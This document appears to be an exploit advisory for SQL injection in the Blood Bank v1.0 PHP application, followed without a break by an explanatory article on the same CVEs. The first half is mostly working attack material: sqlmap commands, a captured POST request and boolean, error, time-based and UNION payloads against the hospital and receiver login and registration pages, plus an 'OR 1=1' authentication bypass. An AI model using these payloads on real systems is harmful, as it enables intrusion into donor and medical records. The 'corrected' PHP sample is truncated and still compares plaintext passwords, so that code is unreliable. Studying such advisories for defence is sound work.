Blood Bank v1.0 - Multiple SQL Injection
# Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018
-------------------------------------------------------------------------------
1. Description:
The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
Vulnerable File: /hospitalLogin.php
Parameter Names: hemail, hpassword
2. Proof of Concept:
----------------------
Execute sqlmap using either the 'hemain' or 'hpassword' parameter to retrieve the current database:
sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
SQLMap Response:
----------------------
Parameter: hemail (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
-------------------------------------------------------------------------------
1. Description:
The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database
Vulnerable File: /receiverLogin.php
Parameter Names: remail, rpassword
2. Proof of Concept:
----------------------
Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:
sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db
SQLMap Response:
----------------------
---
Parameter: remail (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
---
---
Parameter: rpassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
---
-------------------------------------------------------------------------------
# Description:
The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
Vulnerable File: /receiverReg.php
Parameter Name: remail
# Proof of Concept:
----------------------
1. Save the POST request of receiverReg.php to a request.txt file
---
POST /bloodbank/file/receiverReg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
Content-Length: 877
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/register.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rname"
test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rbg"
A+
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rcity"
test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rphone"
05555555555
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="remail"
test@test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rpassword"
test123
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rregister"
Register
-----------------------------2653697510272605730288393868--
---
2. Execute sqlmap using 'remail' parameter to retrieve the current database:
sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-dbBlood Bank v1.0: Multiple SQL Injection Vulnerabilities – A Deep Dive into CVE-2023-46014, CVE-2023-46017, and CVE-2023-46018
Security vulnerabilities in web applications are not just theoretical risks—they can lead to real-world data breaches, unauthorized access, and systemic compromise. One such example is Blood Bank v1.0, a PHP-based blood donation management system available on code-projects.org. Despite its seemingly benign purpose, this application harbors multiple critical SQL injection flaws that have been formally recognized by the CVE database as CVE-2023-46014, CVE-2023-46017, and CVE-2023-46018. These vulnerabilities affect two critical login endpoints: /hospitalLogin.php and /receiverLogin.php, exposing sensitive data and undermining authentication mechanisms.
Understanding the Vulnerability: Input Sanitization Failure
SQL injection occurs when user input is directly embedded into SQL queries without proper validation or sanitization. In Blood Bank v1.0, both hemail and hpassword in hospitalLogin.php, and remail and rpassword in receiverLogin.php, are used to construct database queries without escaping special characters or validating input format.
Attackers can exploit this by injecting malicious SQL payloads through these parameters. For instance, a simple payload like ' OR 1=1 -- can bypass authentication checks entirely, allowing unauthorized access to the database.
hemail=test@test' OR 1=1 -- &hpassword=test&hlogin=Login
This payload, when sent via POST request, manipulates the SQL query logic to always evaluate as true, effectively granting access to the hospital login system without valid credentials.
Proof of Concept: SQLMap Demonstrates Exploitability
Security researcher Ersin Erenler confirmed the presence of these vulnerabilities using sqlmap, a widely used automated tool for detecting and exploiting SQL injection flaws. The following proof-of-concept demonstrates how sqlmap identifies multiple attack vectors:
1. Boolean-Based Blind Injection
hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
This payload uses a boolean condition to infer database behavior. If the response differs based on whether the condition is true or false, sqlmap can determine the presence of SQL injection. This method is effective in environments where direct output is not visible.
2. Error-Based Injection (FLOOR)
hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
When MySQL encounters an error during query execution (e.g., due to duplicate key values in FLOOR(RAND(0)*2)), it returns an error message containing the injected string. This error output reveals information about the database structure, such as the current database name, which can be extracted via automated tools like sqlmap.
3. Time-Based Blind Injection
hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
This payload triggers a delay in the database response using SLEEP(5). If the server takes longer to respond, the attacker knows the injection was successful. This method is particularly useful when no error or boolean output is available.
4. UNION Query Injection
hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
By using UNION ALL, attackers can append their own data to the original query results. The CONCAT function outputs a string in hexadecimal format, which can be decoded to reveal database information. This method allows extraction of data such as table names, user credentials, or even sensitive medical records.
Impact and Risk Assessment
| Attack Vector | Exploited Parameter | Severity | Potential Outcome |
|---|---|---|---|
| Authentication Bypass | hemail, hpassword | High | Unrestricted access to hospital admin system |
| Database Information Leak | remail, rpassword | High | Reveal database schema, user data, blood donor records |
| Remote Code Execution (via SQL) | Both | Medium | With advanced payloads, possible execution of OS commands via MySQL |
Given the sensitive nature of blood bank data—personal identifiers, medical history, donor records—the risk of exposure is extremely high. An attacker could not only access user accounts but also manipulate donation records, falsify donor eligibility, or even delete critical data.
Best Practices for Prevention
While this vulnerability is exploitable, it is entirely preventable with proper security practices. The following measures should be implemented:
- Use Prepared Statements (Parameterized Queries): Instead of concatenating user input into SQL, use
mysqli_prepare()orPDOto bind parameters securely. - Input Validation and Sanitization: Ensure email fields follow standard formats (e.g.,
^[\w.-]+@[\w.-]+\.\w+$) and reject malformed input. - Rate Limiting and Logging: Monitor login attempts and block repeated failed attempts to prevent brute-force or injection attacks.
- Use Secure Authentication Mechanisms: Implement bcrypt hashing for passwords and enforce strong password policies.
- Regular Security Audits: Conduct penetration testing using tools like sqlmap, OWASP ZAP, or Burp Suite to detect vulnerabilities early.
Corrected Code Example (Improved Hospital Login)
connect_error) {
die("Connection failed");
}
// Use prepared statement
$stmt = $conn->prepare("SELECT id FROM hospitals WHERE email = ? AND password = ?");
$stmt->bind_param("ss", $email, $password);
$stmt->execute();
$result = $stmt->get_result();
if ($result->num_rows > 0) {
echo "Login successful";
} else {
echo "Invalid credentials";
}
$stmt->close();
$conn->close();
}
?>
This corrected code uses prepared statements to prevent SQL injection, validates email input, and securely handles database interactions. It eliminates the risk of direct injection and ensures that user input cannot manipulate SQL queries.
Conclusion: Lessons from Blood Bank v1.0
Blood Bank v1.0 serves as a stark reminder that even open-source, educational projects can harbor serious security flaws. The CVEs assigned to this application underscore the importance of security awareness in software development. Developers must never assume that a project is "safe" simply because it is publicly available or intended for learning.
By understanding the mechanics of SQL injection—how payloads like OR 1=1 or UNION SELECT manipulate query logic—and by applying modern defensive techniques, we can protect critical systems from exploitation. The real-world consequences of such vulnerabilities—especially in healthcare applications—can be devastating. Prevention is not optional; it is essential.